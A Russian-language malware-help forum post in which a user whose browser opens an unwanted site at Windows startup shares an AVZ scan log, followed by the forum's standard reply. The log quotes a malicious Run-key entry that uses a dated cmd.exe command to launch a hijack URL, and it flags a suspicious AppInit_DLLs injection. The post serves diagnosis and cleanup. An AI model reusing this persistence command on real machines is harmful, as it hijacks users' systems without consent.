Доброго времени суток. Проблема следующая :
При запуске Windows автоматически запускается браузер и запускается сайт http://stabgames.org/ .
С отправкой логов произошли сложности, т.к. AVZ на английском.
AVZ Antiviral Toolkit log; AVZ version is 4.41
Scanning started at 18.11.2013 18:17:17
Database loaded: signatures - 297613, NN profile(s) - 2, malware removal microprograms - 56, signature database released 18.11.2013 16:00
Heuristic microprograms loaded: 405
PVS microprograms loaded: 9
Digital signatures of system files loaded: 611695
Heuristic analyzer mode: Maximum heuristics mode
Malware removal mode: disabled
Windows version is: 6.1.7601, Service Pack 1 ; AVZ is run with administrator rights
System Restore: enabled
1. Searching for Rootkits and other software intercepting API functions
1.1 Searching for user-mode API hooks
Analysis: kernel32.dll, export table found in section .text
Analysis: ntdll.dll, export table found in section .text
Analysis: user32.dll, export table found in section .text
Analysis: advapi32.dll, export table found in section .text
Analysis: ws2_32.dll, export table found in section .text
Analysis: wininet.dll, export table found in section .text
Analysis: rasapi32.dll, export table found in section .text
Analysis: urlmon.dll, export table found in section .text
Analysis: netapi32.dll, export table found in section .text
1.2 Searching for kernel-mode API hooks
Error - file not found (C:\SystemRoot\system32\xNtKrnl.exe)
1.4 Searching for masking processes and drivers
Checking not performed: extended monitoring driver (AVZPM) is not installed
1.5 Checking IRP handlers
Error loading driver - operation interrupted [C000036B]
2. Scanning RAM
Number of processes found: 33
Extended process analysis: 1536 C:\ProgramData\VKSaver\VKSaver.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:EXE runtime packer ?
Extended process analysis: 6080 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Registered for automatic startup !!
[ES]:Loads RASAPI DLL - may use dialing ?
Extended process analysis: 4220 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Registered for automatic startup !!
Extended process analysis: 1612 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Registered for automatic startup !!
Extended process analysis: 5988 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Registered for automatic startup !!
Extended process analysis: 4364 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Registered for automatic startup !!
Extended process analysis: 6000 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Registered for automatic startup !!
Number of modules loaded: 477
Scanning RAM - complete
3. Scanning disks
4. Checking Winsock Layered Service Provider (SPI/LSP)
LSP settings checked. No errors detected
5. Searching for keyboard/mouse/windows events hooks (Keyloggers, Trojan DLLs)
Checking - disabled by user
6. Searching for opened TCP/UDP ports used by malicious software
Checking - disabled by user
7. Heuristic system check
Latent DLL loading through AppInit_DLLs suspected: "C:\PROGRA~3\VKSaver\vksaver3.dll"
Found a call command line interpreter in startup [DR=1] HKLM\Software\Microsoft\Windows\CurrentVersion\Run \Babakan = [cmd.exe /k if %date:~6,4%%date:~3,2%%date:~0,2% LEQ 20131017 (exit) else (start http://dinoklafbzor.org && exit)]
Checking - complete
8. Searching for vulnerabilities
>> Services: potentially dangerous service allowed: TermService (Службы удаленных рабочих столов)
>> Services: potentially dangerous service allowed: SSDPSRV (Обнаружение SSDP)
>> Services: potentially dangerous service allowed: Schedule (Планировщик заданий)
> Services: please bear in mind that the set of services depends on the use of the PC (home PC, office PC connected to corporate network, etc)!
>> Security: disk drives' autorun is enabled
>> Security: administrative shares (C$, D$ ...) are enabled
>> Security: anonymous user access is enabled
>> Security: sending Remote Assistant queries is enabled
Checking - complete
9. Troubleshooting wizard
>> HDD autorun is allowed
>> Network drives autorun is allowed
>> Removable media autorun is allowed
Checking - complete
Files scanned: 514, extracted from archives: 3, malicious software found 0, suspicions - 0
Scanning finished at 18.11.2013 18:17:43
Time of scanning: 00:00:26
If you have a suspicion on presence of viruses or questions on the suspected objects,
you can address http://forum.kaspersky.com/index.php?showforum=19
For automatic scanning of files from the AVZ quarantine you can use the service http://virusdetector.ru/
System Analysis in progress
System Analysis - complete
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) ZLOiPK, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: